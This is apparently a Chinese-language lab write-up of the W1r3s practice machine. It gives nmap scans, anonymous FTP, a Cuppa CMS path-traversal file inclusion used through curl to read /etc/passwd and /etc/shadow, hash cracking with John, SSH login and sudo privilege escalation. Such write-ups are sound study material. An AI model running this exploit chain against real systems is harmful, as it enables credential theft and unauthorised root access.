W1r3s靶场笔记
一、常规nmap扫描
-
sudo nmap -sn 192.168.160.0/24,经过两次扫描,确定192.168.160.174为靶机ip
-
sudo nmap -min-rate 10000 -p- 192.168.160.174
扫描发现开放4个端口
-
sudo nmap -sT -sV -O -p21,22,80,3306 192.168.160.174,扫描服务信息
-
sudo nmap --script=vuln -p21,22,80,3306 192.168.160.174,扫描漏洞
二、尝试FTP匿名登录
-
sudo ftp 192.168.160.174,尝试anonymous匿名登录
-
下载ftp服务的一些有用文件进行分析
-
发现02.txt文件有些编码文件,尝试识别破解
sudo hash-identifier ‘01ec2d8fc11c493b25029fb1f47f39ce’
-
发现employee-names.txt 文件内容为员工姓名,可能有用,其他文件暂无有用信息
三、80端口web渗透
-
常规扫描一波目录
sudo feroxbuster -u ‘http://192.168.160.174/’ -w top7k.txt
发现cuppa cms和WordPress
-
搜索历史漏洞,发现cuppa cms有个文件包含漏洞,尝试利用:
-
下载payload文件
payload:http://target/cuppa/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd
利用为:http://192.168.160.174/administrator/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd
-
将读取到的文件通过curl编码导出为文本(payload文件提到可能需要将url部分编码才能正常读取)
sudo curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/passwd http://192.168.160.174/administrator/alerts/alertConfigField.php | html2text
-
读取shadow文件
sudo curl --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow http://192.168.160.174/administrator/alerts/alertConfigField.php
-
将读取到的hash值保存,使用John破解
sudo vim hash
john hash
-
利用破解的账号密码进行ssh连接,获取基础权限shell
sudo ssh w1r3s@192.168.160.174
四、提权
-
运行sudo -l查看当前用户权限,发现是所有权限
-
提权
可以用sudo创建一个新终端或者反弹一个shell,都是具有root权限